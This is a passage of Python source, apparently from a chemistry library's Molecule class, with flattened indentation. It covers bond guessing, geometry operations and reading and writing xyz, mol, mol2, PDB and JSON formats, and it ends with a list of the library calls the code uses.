Just like :meth:`add_bond`, this method accepts either a single argument that is a |Bond| instance, or two arguments being instances of |Atom|. In both cases objects used as arguments have to belong to the molecule.
"""
if isinstance(arg1, Atom) and isinstance(arg2, Atom):
delbond = self.find_bond(arg1, arg2)
elif isinstance(arg1, Bond):
delbond = arg1
else:
raise MoleculeError('delete_bond: invalid arguments passed')
if delbond in self.bonds:
delbond.mol = None
self.bonds.remove(delbond)
delbond.atom1.bonds.remove(delbond)
delbond.atom2.bonds.remove(delbond)
def delete_all_bonds(self):
"""Delete all bonds from the molecule."""
for b in reversed(self.bonds):
self.delete_bond(b)
def find_bond(self, atom1, atom2):
"""Find and return a bond between *atom1* and *atom2*. Both atoms have to belong to the molecule. If a bond between chosen atoms does not exist, ``None`` is returned."""
if atom1.mol != self or atom2.mol != self:
raise MoleculeError('find_bond: atoms passed as arguments have to belong to the molecule')
for b in atom1.bonds:
if atom2 is b.other_end(atom1):
return b
return None
def set_atoms_id(self):
"""Equip each atom of this molecule with ``id`` attribute equal to its position within ``atoms`` list."""
for i,at in enumerate(self.atoms):
at.id = i+1
def unset_atoms_id(self):
"""Delete ``id`` attributes of all atoms."""
for at in self.atoms:
try:
del at.id
except AttributeError:
pass
def neighbors(self, atom):
"""Return a list of neighbors of *atom* within this molecule.
*atom* has to belong to the molecule. Returned list follows the same order as ``bonds`` list of *atom*.
"""
if atom.mol != self:
raise MoleculeError('neighbors: passed atom should belong to the molecule')
return [b.other_end(atom) for b in atom.bonds]
def separate(self):
"""Separate this molecule into connected components.
Returned is a list of new |Molecule| objects (all atoms and bonds are disjoint with original molecule). Each element of this list is identical to one connected component of the base molecule. A connected component is a subset of atoms such that there exists a path (along one or more bonds) between any two atoms.
Example::
>>> mol = Molecule('/xyz_dimers/NH3-H2O.xyz')
>>> mol.guess_bonds()
>>> print(mol)
Atoms:
1 N -1.395591 -0.021564 0.000037
2 H -1.629811 0.961096 -0.106224
3 H -1.862767 -0.512544 -0.755974
4 H -1.833547 -0.330770 0.862307
5 O 1.568501 0.105892 0.000005
6 H 0.606736 -0.033962 -0.000628
7 H 1.940519 -0.780005 0.000222
Bonds:
(5)--1.0--(7)
(5)--1.0--(6)
(1)--1.0--(3)
(1)--1.0--(4)
(1)--1.0--(2)
>>> x = mol.separate()
>>> for i in x: print(i)
Atoms:
1 N -1.395591 -0.021564 0.000037
2 H -1.629811 0.961096 -0.106224
3 H -1.862767 -0.512544 -0.755974
4 H -1.833547 -0.330770 0.862307
Bonds:
(1)--1.0--(3)
(1)--1.0--(4)
(1)--1.0--(2)
Atoms:
1 O 1.568501 0.105892 0.000005
2 H 0.606736 -0.033962 -0.000628
3 H 1.940519 -0.780005 0.000222
Bonds:
(1)--1.0--(3)
(1)--1.0--(2)
"""
frags = []
clone = self.copy()
for at in clone:
at._visited = False
def dfs(v, mol):
v._visited = True
v.mol = mol
for e in v.bonds:
e.mol = mol
u = e.other_end(v)
if not u._visited:
dfs(u, mol)
for src in clone.atoms:
if not src._visited:
m = Molecule()
dfs(src, m)
frags.append(m)
for at in clone.atoms:
del at._visited
at.mol.atoms.append(at)
for b in clone.bonds:
b.mol.bonds.append(b)
return frags
def guess_bonds(self):
"""Try to guess bonds in the molecule based on types and positions of atoms.
All previously existing bonds are removed. New bonds are generated based on interatomic distances and information about maximal number of bonds for each atom type (``connectors`` property, taken from |PeriodicTable|).
        The problem of finding molecular bonds for a given set of atoms in space does not have a general solution, especially considering the fact that the chemical bond is itself not a precisely defined concept. For every method, no matter how sophisticated, there will always be corner cases for which the method produces disputable results. Moreover, depending on the context (area of application) the desired solution for a particular geometry may vary. Please do not treat this method as an oracle always providing the proper solution. The algorithm used here gives very good results for geometries that are not very far from the optimal geometry, especially ones consisting of lighter atoms. All kinds of organic molecules, including aromatic ones, usually work very well. Problematic results can emerge for transition metal complexes, transition states, incomplete molecules etc.
The algorithm used scales as *n log n* where *n* is the number of atoms.
.. warning::
This method works reliably only for geometries representing complete molecules. If some atoms are missing (for example, a protein without hydrogens) the resulting set of bonds would usually contain more bonds or bonds with higher order than expected.
"""
def element(order, ratio, atom1, atom2):
eford = order
if order == 1.5:
eford = 1.15
elif order == 1 and {atom1.symbol, atom2.symbol} == {'C', 'N'}:
eford = 1.11
return ((eford+0.9)*ratio, order, ratio, atom1, atom2)
self.delete_all_bonds()
dmax = 1.28
cubesize = dmax*2.1*max([at.radius for at in self.atoms])
cubes = {}
for i,at in enumerate(self.atoms):
at._id = i+1
at.free = at.connectors
at.cube = tuple(map(lambda x: int(math.floor(x/cubesize)), at.coords))
if at.cube in cubes:
cubes[at.cube].append(at)
else:
cubes[at.cube] = [at]
neighbors = {}
for cube in cubes:
neighbors[cube] = []
for i in range(cube[0]-1, cube[0]+2):
for j in range(cube[1]-1, cube[1]+2):
for k in range(cube[2]-1, cube[2]+2):
if (i,j,k) in cubes:
neighbors[cube] += cubes[(i,j,k)]
heap = []
for at1 in self.atoms:
if at1.free > 0:
for at2 in neighbors[at1.cube]:
if (at2.free > 0) and (at1._id < at2._id):
ratio = at1.distance_to(at2)/(at1.radius+at2.radius)
if (ratio < dmax):
heap.append(element(0, ratio, at1, at2))
#I hate to do this, but I guess there's no other way :/ [MH]
if (at1.atnum == 16 and at2.atnum == 8):
at1.free = 6
elif (at2.atnum == 16 and at1.atnum == 8):
at2.free = 6
elif (at1.atnum == 7):
at1.free += 1
elif (at2.atnum == 7):
at2.free += 1
heapq.heapify(heap)
for at in self.atoms:
if at.atnum == 7:
if at.free > 6:
at.free = 4
else:
at.free = 3
while heap:
val, o, r, at1, at2 = heapq.heappop(heap)
step = 1 if o in [0,2] else 0.5
if at1.free >= step and at2.free >= step:
o += step
at1.free -= step
at2.free -= step
if o < 3:
heapq.heappush(heap, element(o,r,at1,at2))
else:
self.add_bond(at1,at2,o)
elif o > 0:
if o == 1.5:
o = Bond.AR
self.add_bond(at1,at2,o)
def dfs(atom, par):
atom.arom += 1000
for b in atom.bonds:
oe = b.other_end(atom)
if b.is_aromatic() and oe.arom < 1000:
if oe.arom > 2:
return False
if par and oe.arom == 1:
b.order = 2
return True
if dfs(oe, 1-par):
b.order = 1 + par
return True
for at in self.atoms:
at.arom = len(list(filter(Bond.is_aromatic, at.bonds)))
for at in self.atoms:
if at.arom == 1:
dfs(at, 1)
for at in self.atoms:
del at.cube,at.free,at._id,at.arom
#===================================================================================================
#==== Geometry operations ==========================================================================
#===================================================================================================
def translate(self, vector, unit='angstrom'):
"""Move this molecule in space by *vector*, expressed in *unit*.
*vector* should be an iterable container of length 3 (usually tuple, list or numpy array). *unit* describes unit of values stored in *vector*.
"""
for at in self.atoms:
at.translate(vector, unit)
def rotate(self, matrix):
"""Rotate this molecule according to rotation *matrix*.
*matrix* should be a container with 9 numerical values. It can be a list (tuple, numpy array etc.) listing matrix elements row-wise, either flat (``[1,2,3,4,5,6,7,8,9]``) or in two-level fashion (``[[1,2,3],[4,5,6],[7,8,9]]``).
.. note::
This method does not check if supplied matrix is a proper rotation matrix.
"""
for at in self.atoms:
at.rotate(matrix)
def rotate_bond(self, bond, atom, angle, unit='radian'):
"""Rotate given *bond* by an *angle* expressed in *unit*.
*bond* should be chosen in such a way, that it divides the molecule into two parts (using a bond being part of a ring results in an error). *atom* has to belong to *bond* and is used to pick which "half" of the molecule is rotated. Positive angle denotes counterclockwise rotation (looking along the bond, from the stationary part of the molecule).
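        Example (the file name and atom numbering are only illustrative)::
            >>> from math import pi
            >>> mol = Molecule('ethanol.xyz')
            >>> mol.guess_bonds()
            >>> b = mol[(1,2)]
            >>> mol.rotate_bond(b, mol[1], pi/3)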
"""
if atom not in bond:
raise MoleculeError('rotate_bond: atom has to belong to the bond')
atoms_to_rotate = {atom}
def dfs(v):
for e in v.bonds:
if e is not bond:
u = e.other_end(v)
if u not in atoms_to_rotate:
atoms_to_rotate.add(u)
dfs(u)
dfs(atom)
if len(atoms_to_rotate) == len(self):
raise MoleculeError('rotate_bond: chosen bond does not divide molecule')
other_end = bond.other_end(atom)
v = numpy.array(other_end.vector_to(atom))
v /= numpy.linalg.norm(v)
W = numpy.array([[0, -v[2], v[1]],
[v[2], 0, -v[0]],
[-v[1], v[0], 0]])
angle = Units.convert(angle, unit, 'radian')
a1 = math.sin(angle)
a2 = 2 * math.pow(math.sin(0.5 * angle), 2)
rotmat = numpy.identity(3) + a1 * W + a2 * numpy.dot(W,W)
trans = numpy.array(other_end.vector_to((0,0,0)))
for at in atoms_to_rotate:
at.translate(trans)
at.rotate(rotmat)
at.translate(-trans)
def closest_atom(self, point, unit='angstrom'):
"""Return the atom of this molecule that is the closest one to some *point* in space.
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*.
"""
dist = float('inf')
for at in self.atoms:
newdist = at.distance_to(point, unit=unit)
if newdist < dist:
dist = newdist
ret = at
return ret
def distance_to_point(self, point, unit='angstrom', result_unit='angstrom'):
"""Calculate the distance between this molecule and some *point* in space (distance between *point* and :meth:`closest_atom`).
*point* should be an iterable container of length 3 (for example: tuple, |Atom|, list, numpy array). *unit* describes unit of values stored in *point*. Returned value is expressed in *result_unit*.
"""
at = self.closest_atom(point, unit)
        return at.distance_to(point, unit, result_unit)
def distance_to_mol(self, other, result_unit='angstrom', return_atoms=False):
"""Calculate the distance between this molecule and some *other* molecule.
The distance is measured as the smallest distance between a pair of atoms, one belonging to each of the molecules. Returned distance is expressed in *result_unit*.
If *return_atoms* is ``False``, only a single number is returned. If *return_atoms* is ``True``, this method returns a tuple ``(distance, atom1, atom2)`` where ``atom1`` and ``atom2`` are atoms fulfilling the minimal distance, with atom1 belonging to this molecule and atom2 to *other*.
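        Example (``mol1`` and ``mol2`` are two separate molecules)::
            >>> d, a1, a2 = mol1.distance_to_mol(mol2, return_atoms=True)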
"""
dist = float('inf')
for at1 in self.atoms:
for at2 in other.atoms:
newdist = (at1.x-at2.x)**2 + (at1.y-at2.y)**2 + (at1.z-at2.z)**2
if newdist < dist:
dist = newdist
atom1 = at1
atom2 = at2
res = Units.convert(math.sqrt(dist), 'angstrom', result_unit)
if return_atoms:
return res, atom1, atom2
return res
def wrap(self, length, angle=2*math.pi, length_unit='angstrom', angle_unit='radian'):
"""wrap(self, length, angle=2*pi, length_unit='angstrom', angle_unit='radian')
Transform the molecule wrapping its x-axis around z-axis. This method is useful for building nanotubes or molecular wedding rings.
Atomic coordinates are transformed in the following way:
        * z coordinates remain untouched
* x axis gets wrapped around the circle centered in the origin of new coordinate system. Each segment of x axis of length *length* ends up as an arc of a circle subtended by an angle *angle*. The radius of this circle is R = *length*/*angle*.
* part of the plane between the x axis and the line y=R is transformed into the interior of the circle, with line y=R being squashed into a single point - the center of the circle.
* part of the plane above line y=R is dropped
* part of the plane below x axis is transformed into outside of the circle
* transformation is done in such a way that distances along y axis are preserved
Before:
.. image:: _static/wrap.*
After:
.. image:: _static/wrap2.*
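        Example (``sheet`` is a planar molecule extending 40 angstrom along the x axis; it is closed into a tube of radius 40/(2*pi))::
            >>> sheet.wrap(40.0)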
"""
length = Units.convert(length, length_unit, 'angstrom')
angle = Units.convert(angle, angle_unit, 'radian')
xs = [atom.x for atom in self.atoms]
if max(xs)-min(xs) > length:
raise MoleculeError('wrap: x-extension of the molecule is larger than length')
if angle < 0 or angle > 2*math.pi:
raise MoleculeError('wrap: angle must be between 0 and 2*pi')
R = length / angle
def map_ring(x,y):
return ((R-y) * math.cos(x/R), (R-y) * math.sin(x/R))
for at in self.atoms:
at.x, at.y = map_ring(at.x, at.y)
def get_center_of_mass(self, unit='angstrom'):
"""Return the center of mass of this molecule (as a tuple). Returned coordinates are expressed in *unit*."""
center = [0.0,0.0,0.0]
total_mass = 0.0
for at in self.atoms:
total_mass += at.mass
for i in range(3):
center[i] += at.mass*at.coords[i]
for i in range(3):
center[i] = Units.convert(center[i]/total_mass, 'angstrom', unit)
return tuple(center)
def get_mass(self):
"""Return mass of the molecule, expressed in atomic units."""
return sum([at.mass for at in self.atoms])
def get_formula(self):
"""Calculate the molecular formula for this molecule.
Returned value is a single string. It contains simple molecular formula (it only includes atom types and total number of atoms of each type)."""
atnums = [at.atnum for at in self.atoms]
s = set(atnums)
formula = ''
for i in s:
formula += PT.get_symbol(i) + str(atnums.count(i))
return formula
#===================================================================================================
#==== Magic methods ================================================================================
#===================================================================================================
def __len__(self):
"""Length of a molecule is the number of atoms."""
return len(self.atoms)
def __str__(self):
"""Return string representation of this molecule.
Information about atoms are printed in ``xyz`` format fashion -- each atom in a separate, enumerated line. Then, if the molecule contains any bonds, they are printed. Each bond is printed in a separate line, with information about both atoms and bond order. Example::
Atoms:
1 N 0.00000 0.00000 0.38321
2 H 0.94218 0.00000 -0.01737
3 H -0.47109 0.81595 -0.01737
4 H -0.47109 -0.81595 -0.01737
Bonds:
(1)----1----(2)
(1)----1----(3)
(1)----1----(4)
"""
s = ' Atoms: \n'
for i,atom in enumerate(self.atoms):
s += ('%5i'%(i+1)) + str(atom) + '\n'
if len(self.bonds) > 0:
for j,atom in enumerate(self.atoms):
atom._tmpid = j+1
s += ' Bonds: \n'
for bond in self.bonds:
s += ' (%d)--%1.1f--(%d)\n'%(bond.atom1._tmpid, bond.order, bond.atom2._tmpid)
for atom in self.atoms:
del atom._tmpid
if self.lattice:
s += ' Lattice:\n'
for vec in self.lattice:
s += ' %10.6f %10.6f %10.6f\n'%vec
return s
def __iter__(self):
"""Iterate over atoms."""
return iter(self.atoms)
def __getitem__(self, key):
"""Bracket notation can be used to access atoms or bonds directly.
If *key* is a single int (``mymol[i]``), return i-th atom of this molecule. If *key* is a pair of ints (``mymol[(i,j)]``), return bond between i-th and j-th atom (``None`` if such a bond does not exist).
        This method is read only (things like ``mymol[3] = Atom(...)`` are forbidden). Numbering of atoms within a molecule starts with 1.
"""
if isinstance(key, int):
if key == 0:
raise MoleculeError('Numbering of atoms starts with 1')
if key < 0:
return self.atoms[key]
return self.atoms[key-1]
if isinstance(key, tuple) and len(key) == 2:
if key[0] == 0 or key[1] == 0:
raise MoleculeError('Numbering of atoms starts with 1')
return self.find_bond(self.atoms[key[0]-1], self.atoms[key[1]-1])
def __add__(self, other):
"""Create a new molecule that is a sum of this molecule and *other*::
>>> newmol = mol1 + mol2
The new molecule has atoms, bonds and all other elements distinct from both components. ``properties`` of ``newmol`` are ``properties`` of ``mol1`` :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of ``mol2``.
"""
m = self.copy()
m += other
return m
def __iadd__(self, other):
"""Add *other* molecule to this one::
>>> protein += water
All atoms and bonds present in *other* are copied and copies are added to this molecule. ``properties`` of this molecule are :meth:`soft_updated<scm.plams.settings.Settings.soft_update>` with ``properties`` of *other*.
"""
othercopy = other.copy()
self.atoms += othercopy.atoms
self.bonds += othercopy.bonds
for atom in self.atoms:
atom.mol = self
for bond in self.bonds:
bond.mol = self
self.properties.soft_update(othercopy.properties)
return self
def __copy__(self):
return self.copy()
#===================================================================================================
#==== File/format IO ===============================================================================
#===================================================================================================
def readxyz(self, f, frame):
def newatom(line):
lst = line.split()
shift = 1 if (len(lst) > 4 and lst[0] == str(i)) else 0
num = lst[0+shift]
if isinstance(num, str):
num = PT.get_atomic_number(num)
self.add_atom(Atom(atnum=num, coords=(lst[1+shift],lst[2+shift],lst[3+shift])))
def newlatticevec(line):
lst = line.split()
self.lattice.append((float(lst[1]),float(lst[2]),float(lst[3])))
fr = frame
begin, first, nohead = True, True, False
for line in f:
if first:
if line.strip() == '' : continue
first = False
try:
n = int(line.strip())
fr -= 1
except ValueError:
nohead = True
newatom(line)
elif nohead:
if line.strip() == '' : break
if 'VEC' in line.upper():
newlatticevec(line)
else:
newatom(line)
elif fr != 0:
try:
n = int(line.strip())
fr -= 1
except ValueError:
continue
else:
if begin:
begin = False
i = 1
if line:
self.properties['comment'] = line.rstrip()
else:
if i <= n:
newatom(line)
i += 1
elif 'VEC' in line.upper():
newlatticevec(line)
else:
break
if not nohead and fr > 0:
raise FileError('readxyz: There are only %i frames in %s' % (frame - fr, f.name))
def writexyz(self, f):
f.write(str(len(self)) + '\n')
if 'comment' in self.properties:
comment = self.properties['comment']
if isinstance(comment, list):
comment = comment[0]
f.write(comment)
f.write('\n')
for at in self.atoms:
f.write(str(at) + '\n')
for i,vec in enumerate(self.lattice):
f.write('VEC'+str(i+1) + '%14.6f %14.6f %14.6f\n'%tuple(vec))
def readmol(self, f, frame):
if frame != 1:
raise FileError('readmol: .mol files do not support multiple geometries')
comment = []
for i in range(4):
line = f.readline().rstrip()
if line:
spl = line.split()
if spl[len(spl)-1] == 'V2000':
natom = int(spl[0])
nbond = int(spl[1])
for j in range(natom):
atomline = f.readline().split()
crd = tuple(map(float, atomline[0:3]))
symb = atomline[3]
try:
num = PT.get_atomic_number(symb)
except PTError:
num = 0
self.add_atom(Atom(atnum=num, coords=crd))
for j in range(nbond):
bondline = f.readline().split()
at1 = self.atoms[int(bondline[0]) - 1]
at2 = self.atoms[int(bondline[1]) - 1]
ordr = int(bondline[2])
if ordr == 4:
ordr = Bond.AR
self.add_bond(Bond(atom1=at1, atom2=at2, order=ordr))
break
elif spl[len(spl)-1] == 'V3000':
raise FileError('readmol: Molfile V3000 not supported. Please convert')
else:
comment.append(line)
if comment:
self.properties['comment'] = comment
def writemol(self, f):
commentblock = ['\n']*3
if 'comment' in self.properties:
comment = self.properties['comment']
if isinstance(comment, str):
commentblock[0] = comment + '\n'
elif isinstance(comment, list):
comment = comment[0:3]
while len(comment) < 3:
comment.append('')
commentblock = [a+b for a,b in zip(comment,commentblock)]
f.writelines(commentblock)
self.set_atoms_id()
f.write('%3i%3i 0 0 0 0 0 0 0 0999 V2000\n' % (len(self.atoms),len(self.bonds)))
for at in self.atoms:
f.write('%10.4f%10.4f%10.4f %-3s 0 0 0 0 0 0\n' % (at.x,at.y,at.z,at.symbol))
for bo in self.bonds:
order = bo.order
if order == Bond.AR:
order = 4
f.write('%3i%3i%3i 0 0 0\n' % (bo.atom1.id,bo.atom2.id,order))
self.unset_atoms_id()
f.write('M END\n')
def readmol2(self, f, frame):
if frame != 1:
            raise MoleculeError('readmol2: .mol2 files do not support multiple geometries')
bondorders = {'1':1, '2':2, '3':3, 'am':1, 'ar':Bond.AR, 'du':0, 'un':1, 'nc':0}
mode = ('', 0)
for i, line in enumerate(f):
line = line.rstrip()
if not line:
continue
elif line[0] == '#':
continue
elif line[0] == '@':
line = line.partition('>')[2]
if not line:
raise FileError('readmol2: Error in %s line %i: invalid @ record' % (f.name, str(i+1)))
mode = (line, i)
elif mode[0] == 'MOLECULE':
pos = i - mode[1]
if pos == 1:
self.properties['name'] = line
elif pos == 3:
self.properties['type'] = line
elif pos == 4:
self.properties['charge_type'] = line
elif pos == 5:
self.properties['flags'] = line
elif pos == 6:
self.properties['comment'] = line
elif mode[0] == 'ATOM':
spl = line.split()
if len(spl) < 6:
raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1)))
symb = spl[5].partition('.')[0]
try:
num = PT.get_atomic_number(symb)
except PTError:
num = 0
crd = tuple(map(float, spl[2:5]))
newatom = Atom(atnum=num, coords=crd, name=spl[1], type=spl[5])
if len(spl) > 6:
newatom.properties['subst_id'] = spl[6]
if len(spl) > 7:
newatom.properties['subst_name'] = spl[7]
if len(spl) > 8:
newatom.properties['charge'] = float(spl[8])
if len(spl) > 9:
newatom.properties['flags'] = spl[9]
self.add_atom(newatom)
elif mode[0] == 'BOND':
spl = line.split()
if len(spl) < 4:
raise FileError('readmol2: Error in %s line %i: not enough values in line' % (f.name, str(i+1)))
try:
atom1 = self.atoms[int(spl[1])-1]
atom2 = self.atoms[int(spl[2])-1]
except IndexError:
raise FileError('readmol2: Error in %s line %i: wrong atom ID' % (f.name, str(i+1)))
newbond = Bond(atom1, atom2, order=bondorders[spl[3]])
if len(spl) > 4:
for flag in spl[4].split('|'):
newbond.properties[flag] = True
self.add_bond(newbond)
def writemol2(self, f):
bondorders = ['1','2','3','ar']
def write_prop(name, obj, separator, space=0, replacement=None):
form_str = '%-' + str(space) + 's'
if name in obj.properties:
f.write(form_str % str(obj.properties[name]))
elif replacement is not None:
f.write(form_str % str(replacement))
f.write(separator)
f.write('@<TRIPOS>MOLECULE\n')
write_prop('name', self, '\n')
f.write('%i %i\n' % (len(self.atoms),len(self.bonds)))
write_prop('type', self, '\n')
write_prop('charge_type', self, '\n')
write_prop('flags', self, '\n')
write_prop('comment', self, '\n')
f.write('\n@<TRIPOS>ATOM\n')
for i,at in enumerate(self.atoms):
f.write('%5i ' % (i+1))
write_prop('name', at, ' ', 5, at.symbol+str(i+1))
f.write('%10.4f %10.4f %10.4f ' % at.coords)
write_prop('type', at, ' ', 5, at.symbol)
write_prop('subst_id', at, ' ', 5)
write_prop('subst_name', at, ' ', 7)
write_prop('charge', at, ' ', 6)
write_prop('flags', at, '\n')
at.id = i+1
f.write('\n@<TRIPOS>BOND\n')
for i,bo in enumerate(self.bonds):
f.write('%5i %5i %5i %4s' % (i+1, bo.atom1.id, bo.atom2.id, bondorders[bo.order]))
write_prop('flags', bo, '\n')
self.unset_atoms_id()
def readpdb(self, f, frame):
pdb = PDBHandler(f)
models = pdb.get_models()
if frame > len(models):
raise FileError('readpdb: There are only %i frames in %s' % (len(models), f.name))
symbol_columns = [70,6,7,8]
for i in models[frame-1]:
if i.name in ['ATOM ','HETATM']:
x = float(i.value[0][24:32])
y = float(i.value[0][32:40])
z = float(i.value[0][40:48])
for n in symbol_columns:
symbol = i.value[0][n:n+2].strip()
try:
atnum = PT.get_atomic_number(symbol)
break
except PTError:
if n == symbol_columns[-1]:
raise FileError('readpdb: Unable to deduce the atomic symbol in the following line:\n%s'%(i.name+i.value[0]))
self.add_atom(Atom(atnum=atnum,coords=(x,y,z)))
return pdb
def writepdb(self, f):
pdb = PDBHandler()
pdb.add_record(PDBRecord('HEADER'))
model = []
for i,at in enumerate(self.atoms):
s = 'ATOM %5i %8.3f%8.3f%8.3f %2s ' % (i+1,at.x,at.y,at.z,at.symbol.upper())
model.append(PDBRecord(s))
pdb.add_model(model)
pdb.add_record(pdb.calc_master())
pdb.add_record(PDBRecord('END'))
pdb.write(f)
def read(self, filename, inputformat=None, frame=1):
"""Read molecular coordinates from file.
        *filename* should be a string with a path to the file. If *inputformat* is not ``None``, it should be one of the supported formats (keys occurring in the class attribute ``_readformat``). Otherwise, the format of the file is deduced from the file's extension (for files without an extension the `xyz` format is assumed).
        If the chosen format allows multiple geometries in a single file, *frame* can be used to pick one of them.
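        Example (the file name is only a placeholder; the third frame of a multi-geometry ``xyz`` file is read)::
            >>> mol = Molecule()
            >>> mol.read('trajectory.xyz', frame=3)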
"""
if inputformat is None:
fsplit = filename.rsplit('.',1)
if len(fsplit) == 2:
inputformat = fsplit[1]
else:
inputformat = 'xyz'
if inputformat in self.__class__._readformat:
with open(filename, 'rU') as f:
ret = self._readformat[inputformat](self, f, frame)
return ret
else:
raise MoleculeError('read: Unsupported file format')
def write(self, filename, outputformat=None):
"""Write molecular coordinates to a file.
        *filename* should be a string with a path to the file. If *outputformat* is not ``None``, it should be one of the supported formats (keys occurring in the class attribute ``_writeformat``). Otherwise, the format of the file is deduced from the file's extension (for files without an extension the `xyz` format is assumed).
"""
if outputformat is None:
fsplit = filename.rsplit('.',1)
if len(fsplit) == 2:
outputformat = fsplit[1]
else:
outputformat = 'xyz'
if outputformat in self.__class__._writeformat:
with open(filename, 'w') as f:
self._writeformat[outputformat](self, f)
else:
raise MoleculeError('write: Unsupported file format')
_readformat = {'xyz':readxyz, 'mol':readmol, 'mol2':readmol2, 'pdb':readpdb}
_writeformat = {'xyz':writexyz, 'mol':writemol, 'mol2':writemol2, 'pdb': writepdb}
#===================================================================================================
#==== JSON IO ======================================================================================
#===================================================================================================
def as_dict(self):
"""
        The Molecule information is stored in a dict loosely based on the mol
        `file format <http://onlinelibrarystatic.wiley.com/marvin/help/FF/19693841.html>`_.
        :returns: JSON-serializable dict with ``atomBlock``, ``bondBlock`` and ``properties`` keys
"""
# def create_atom_ids(mol):
# """
# Generate unique identifier for each atom
# :parameter mol: Molecule object containing the atoms
# :type mol: |Molecule|
# """
# ds = []
        #     for i, _ in enumerate(mol.atoms):
# idx = "atom_" + str(i)
# ds.append(idx)
# return ds
def create_atom_block(mol):
"""
            This block stores, for every atom, its atomic number, coordinates,
            atomic symbol and the other properties kept in its *Settings* object.
            :parameter mol: Molecule object containing the atoms
            :type mol: |Molecule|
"""
return [{'coords': at.coords, 'symbol': at.symbol,
'atnum': at.atnum, 'properties': at.properties.as_dict()} for at in mol.atoms]
def create_bond_block(mol):
"""
            :parameter mol: Molecule object containing the atoms and bonds
            :type mol: |Molecule|
            The table below summarizes the information stored for each bond.
            ================== ========================
            Meaning            Value
            ================== ========================
            First atom number  Int
            Second atom number Int
            Bond type          Int (float for aromatic)
                               #. Single
                               #. Double
                               #. Triple
                               #. Aromatic
            Properties         Settings
            ================== ========================
"""
def get_bond_order(bond):
if bond.order:
return bond.order
elif bond.AR:
return bond.AR
else:
msg = "bond does not contain order attribute"
raise AttributeError(msg)
# Represent the atoms involved in the bond like references
# to the unique identifiers stored in the ``atomBlock``
# dict_atom2id = {at: idx for (at, idx) in zip(mol.atoms, ids)}
bonds_list = []
for i, b in enumerate(mol.bonds):
atom1 = mol.atoms.index(b.atom1)
atom2 = mol.atoms.index(b.atom2)
order = get_bond_order(b)
bond = {'atom1': atom1, 'atom2': atom2,
'order': order, 'properties': b.properties.as_dict()}
bonds_list.append(bond)
return bonds_list
d = dict()
d["atomBlock"] = create_atom_block(self)
d["bondBlock"] = create_bond_block(self)
d["properties"] = self.properties
return d
@classmethod
def from_dict(cls, atomBlock, bondBlock, properties):
"""
        Generate a new Molecule instance from the blocks produced by
        ``as_dict`` (i.e. the unpacked, JSON-serialized representation).
        :parameter atomBlock: list of dicts describing the atoms
        :parameter bondBlock: list of dicts describing the bonds
        :parameter properties: molecule-level properties
:returns: |Molecule|
"""
# New Molecule instance
mol = cls()
        # Reconstruct the Atom instances using the JSON data
for at in atomBlock:
atnum = at["atnum"]
coords = at["coords"]
symbol = at["symbol"]
props = at["properties"]
mol.add_atom(Atom(atnum=atnum, coords=coords, symbol=symbol,
**props))
# Reconstruct the bonds using the internal numeration of the molecule
        # built in the previous step.
for b in bondBlock:
id_atom1 = b["atom1"]
id_atom2 = b["atom2"]
atom1 = mol.atoms[id_atom1]
atom2 = mol.atoms[id_atom2]
bond = Bond(atom1=atom1, atom2=atom2, order=b["order"],
**b["properties"])
mol.add_bond(bond)
mol.properties = properties
return mol
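    # A minimal round-trip sketch for the JSON helpers above (assumes `mol`
    # is an already populated molecule, e.g. loaded with `read`):
    #
    #   d = mol.as_dict()
    #   clone = mol.__class__.from_dict(**d)   # same atoms, bonds and properties
    #   assert len(clone.atoms) == len(mol.atoms)
    #   assert len(clone.bonds) == len(mol.bonds)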
|
[
"copy.deepcopy",
"heapq.heapify",
"math.sqrt",
"os.path.basename",
"math.floor",
"numpy.identity",
"math.sin",
"heapq.heappop",
"math.acos",
"numpy.array",
"numpy.linalg.norm",
"math.cos",
"numpy.dot"
] |
[((22720, 22739), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22733, 22739), False, 'import copy\n'), ((35178, 35197), 'heapq.heapify', 'heapq.heapify', (['heap'], {}), '(heap)\n', (35191, 35197), False, 'import heapq\n'), ((39008, 39028), 'numpy.linalg.norm', 'numpy.linalg.norm', (['v'], {}), '(v)\n', (39025, 39028), False, 'import numpy\n'), ((39042, 39109), 'numpy.array', 'numpy.array', (['[[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]]'], {}), '([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])\n', (39053, 39109), False, 'import numpy\n'), ((39227, 39242), 'math.sin', 'math.sin', (['angle'], {}), '(angle)\n', (39235, 39242), False, 'import math\n'), ((9726, 9740), 'math.sqrt', 'math.sqrt', (['res'], {}), '(res)\n', (9735, 9740), False, 'import math\n'), ((11241, 11261), 'math.acos', 'math.acos', (['(num / den)'], {}), '(num / den)\n', (11250, 11261), False, 'import math\n'), ((22574, 22593), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (22587, 22593), False, 'import copy\n'), ((35432, 35451), 'heapq.heappop', 'heapq.heappop', (['heap'], {}), '(heap)\n', (35445, 35451), False, 'import heapq\n'), ((41614, 41629), 'math.sqrt', 'math.sqrt', (['dist'], {}), '(dist)\n', (41623, 41629), False, 'import math\n'), ((11748, 11767), 'numpy.array', 'numpy.array', (['matrix'], {}), '(matrix)\n', (11759, 11767), False, 'import numpy\n'), ((11827, 11851), 'numpy.array', 'numpy.array', (['self.coords'], {}), '(self.coords)\n', (11838, 11851), False, 'import numpy\n'), ((39269, 39290), 'math.sin', 'math.sin', (['(0.5 * angle)'], {}), '(0.5 * angle)\n', (39277, 39290), False, 'import math\n'), ((39313, 39330), 'numpy.identity', 'numpy.identity', (['(3)'], {}), '(3)\n', (39327, 39330), False, 'import numpy\n'), ((39347, 39362), 'numpy.dot', 'numpy.dot', (['W', 'W'], {}), '(W, W)\n', (39356, 39362), False, 'import numpy\n'), ((21675, 21701), 'os.path.basename', 'os.path.basename', (['filename'], {}), '(filename)\n', (21691, 21701), False, 'import os\n'), ((43485, 43500), 'math.cos', 'math.cos', (['(x / R)'], {}), '(x / R)\n', (43493, 43500), False, 'import math\n'), ((43508, 43523), 'math.sin', 'math.sin', (['(x / R)'], {}), '(x / R)\n', (43516, 43523), False, 'import math\n'), ((33757, 33781), 'math.floor', 'math.floor', (['(x / cubesize)'], {}), '(x / cubesize)\n', (33767, 33781), False, 'import math\n')]
|
"""
